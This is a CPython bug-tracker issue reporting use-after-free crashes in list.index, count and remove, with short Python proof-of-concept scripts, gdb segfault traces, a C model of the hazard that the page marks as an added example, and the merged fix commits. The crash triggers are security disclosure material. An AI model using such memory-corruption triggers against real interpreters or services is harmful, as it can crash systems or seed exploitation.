Issue38610
Created on 2019-10-28 05:49 by LCatro, last changed 2022-04-11 14:59 by admin. This issue is now closed.
Pull Requests

| URL | Status | Linked | Edit |
|---|---|---|---|
| PR 17022 | merged | ZackerySpytz, 2019-10-31 20:34 | |
| PR 17758 | merged | miss-islington, 2019-12-30 19:33 | |
| PR 17759 | merged | pablogsal, 2019-12-30 19:35 | |
| PR 18207 | closed | corona10, 2020-01-27 17:39 | |
Messages (5)

msg355513 - Author: LCatro - Date: 2019-10-28 05:49
Code 1:

```c
static PyObject *
list_index_impl(PyListObject *self, PyObject *value, Py_ssize_t start,
                Py_ssize_t stop)
// ...
    for (i = start; i < stop && i < Py_SIZE(self); i++) {
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ); // <== self->ob_item[i] can be used after free ..
```
PoC:

```python
class rewrite_list_eq(list):
    def __eq__(self, other):
        str(other)  # <== str() calls the tp_str slot of `other`, which has already been freed ..
        return NotImplemented

class poc():
    def __eq__(self, other):
        list1.clear()
        return NotImplemented

list1 = rewrite_list_eq([ poc() ])  # the crash in PyObject_Str below needs the subclass, as in PoC 2 and 3
list1.index(list1)  # list_index_impl() -> PyObject_RichCompareBool()
```
Crash Report:

```text
(gdb) run ../py_poc/list_poc_3.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_3.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573 if (Py_TYPE(v)->tp_str == NULL)
```

---
Code 2:

```c
static PyObject *
list_count(PyListObject *self, PyObject *value)
{
    Py_ssize_t count = 0;
    Py_ssize_t i;

    for (i = 0; i < Py_SIZE(self); i++) {
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ); // <== same borrowed self->ob_item[i]
```
PoC:

```python
class rewrite_list_eq(list):
    def __eq__(self, other):
        str(other)
        return NotImplemented

class poc():
    def __eq__(self, other):
        list1.clear()
        return NotImplemented

list1 = rewrite_list_eq([ poc() ])
list1.count(list1)  # list_count() -> PyObject_RichCompareBool()
```
Crash Report:

```text
(gdb) run ../py_poc/list_poc_4.py
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_4.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573 if (Py_TYPE(v)->tp_str == NULL)
```

---
Code 3:

```c
static PyObject *
list_remove(PyListObject *self, PyObject *value)
/*[clinic end generated code: output=f087e1951a5e30d1 input=2dc2ba5bb2fb1f82]*/
{
    Py_ssize_t i;

    for (i = 0; i < Py_SIZE(self); i++) {
        Py_INCREF(self->ob_item[i]);
        int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ);
```
PoC:

```python
class rewrite_list_eq(list):
    def __eq__(self, other):
        str(other)
        return NotImplemented

class poc():
    def __eq__(self, other):
        list1.clear()
        return NotImplemented

list1 = rewrite_list_eq([ poc() ])
list1.remove(list1)  # list_remove() -> PyObject_RichCompareBool()
```
Crash Report:

```text
(gdb) run ../py_poc/list_poc_5.py
Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_5.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573
573 if (Py_TYPE(v)->tp_str == NULL)
```
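Added example, not code from this issue or from CPython: a self-contained C model of the borrowed-reference hazard reported in msg355513, with the vulnerable loop shape beside the owned-reference shape (take a reference before the comparison, release it after) that the merged fix in msg359055 applies. It models list.count, but the same pattern covers index and remove; the Obj, List and hostile_eq names are constructed for illustration, and a "free" is simulated by a flag so the stale access is counted rather than dereferenced.

```c
#include <stdlib.h>
/* Added example, not CPython code: a toy refcounted object and list reproducing
 * the borrowed-reference hazard of bpo-38610. A "freed" object is quarantined
 * (flagged, never returned to malloc) so stale accesses are counted, not UB. */
typedef struct { int refcnt, value, freed; } Obj;
typedef struct { Obj **items; int size; } List;
typedef struct { int count, stale; } Outcome;
static int freed_reads;                   /* accesses to a freed object seen */
static Obj *obj_new(int v) {
    Obj *o = malloc(sizeof *o); if (!o) abort();
    o->refcnt = 1; o->value = v; o->freed = 0; return o;
}
static void obj_decref(Obj *o) { if (--o->refcnt == 0) o->freed = 1; }
static int obj_value(Obj *o) { if (o->freed) freed_reads++; return o->value; }
static void list_clear(List *l) {          /* like list1.clear() in the PoC */
    for (int i = 0; i < l->size; i++) obj_decref(l->items[i]);
    l->size = 0;
}
/* Comparison with a side effect: empties the list being iterated, then
 * touches `a`, mirroring the PoC's __eq__ that calls list1.clear(). */
static int hostile_eq(Obj *a, Obj *b, List *owner) {
    list_clear(owner);
    return obj_value(a) == obj_value(b);
}
/* Vulnerable shape of list_count(): items[i] is only borrowed, so the
 * clear() inside the comparison frees it while it is still in use. */
static int count_borrowed(List *l, Obj *v) {
    int n = 0;
    for (int i = 0; i < l->size; i++) n += hostile_eq(l->items[i], v, l);
    return n;
}
/* Fixed shape, as in the patch: hold an owned reference around the call. */
static int count_owned(List *l, Obj *v) {
    int n = 0;
    for (int i = 0; i < l->size; i++) {
        Obj *a = l->items[i]; a->refcnt++;    /* Py_INCREF(obj) */
        n += hostile_eq(a, v, l);
        obj_decref(a);                        /* Py_DECREF(obj) */
    }
    return n;
}
/* Runs one variant on a fresh one-element list [7], counting the value 7. */
static Outcome run(int (*count)(List *, Obj *)) {
    Obj *slots[1] = { obj_new(7) }, *probe = obj_new(7);
    List l = { slots, 1 };
    freed_reads = 0;
    int c = count(&l, probe);
    Outcome out = { c, freed_reads };
    obj_decref(probe);
    return out;
}
```

Both variants return the same count of 1; only the borrowed-pointer loop touches the object after its last reference was dropped, which is the read that turns into the SIGSEGV in the real PoCs.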
msg355766 - Author: Zackery Spytz (ZackerySpytz) - Date: 2019-10-31 20:35

I have created a patch to fix these crashes. Please consider taking a look.
msg359055 - Author: Pablo Galindo Salgado (pablogsal) - Date: 2019-12-30 19:33

New changeset d9e561d23d994e3ed15f4fcbd7ee5c8fe50f190b by Pablo Galindo (Zackery Spytz) in branch 'master': bpo-38610: Fix possible crashes in several list methods (GH-17022) https://github.com/python/cpython/commit/d9e561d23d994e3ed15f4fcbd7ee5c8fe50f190b
msg359056 - Author: miss-islington (miss-islington) - Date: 2019-12-30 19:51

New changeset fcaf14cd9179bb48850f8f81ce8d5cee28129745 by Miss Islington (bot) in branch '3.8': bpo-38610: Fix possible crashes in several list methods (GH-17022) https://github.com/python/cpython/commit/fcaf14cd9179bb48850f8f81ce8d5cee28129745
msg359057 - Author: Pablo Galindo Salgado (pablogsal) - Date: 2019-12-30 19:58

New changeset 296d45ec10fb55532bc3fac2311a3f91299ecf59 by Pablo Galindo in branch '3.7': [3.7] bpo-38610: Fix possible crashes in several list methods (GH-17022) (GH-17759) https://github.com/python/cpython/commit/296d45ec10fb55532bc3fac2311a3f91299ecf59
History

| Date | User | Action | Args |
|---|---|---|---|
| 2022-04-11 14:59:22 | admin | set | github: 82791 |
| 2020-01-27 17:40:43 | corona10 | set | versions: + Python 3.6 |
| 2020-01-27 17:39:50 | corona10 | set | pull_requests: + pull_request17584 |
| 2019-12-30 19:58:43 | pablogsal | set | status: open -> closed; resolution: fixed; stage: patch review -> resolved |
| 2019-12-30 19:58:34 | pablogsal | set | messages: + msg359057 |
| 2019-12-30 19:51:14 | miss-islington | set | nosy: + miss-islington; messages: + msg359056 |
| 2019-12-30 19:35:36 | pablogsal | set | pull_requests: + pull_request17195 |
| 2019-12-30 19:33:27 | miss-islington | set | pull_requests: + pull_request17194 |
| 2019-12-30 19:33:06 | pablogsal | set | nosy: + pablogsal; messages: + msg359055 |
| 2019-10-31 20:35:48 | ZackerySpytz | set | nosy: + ZackerySpytz; messages: + msg355766 |
| 2019-10-31 20:34:16 | ZackerySpytz | set | keywords: + patch; stage: patch review; pull_requests: + pull_request16539 |
| 2019-10-28 05:49:18 | LCatro | create | |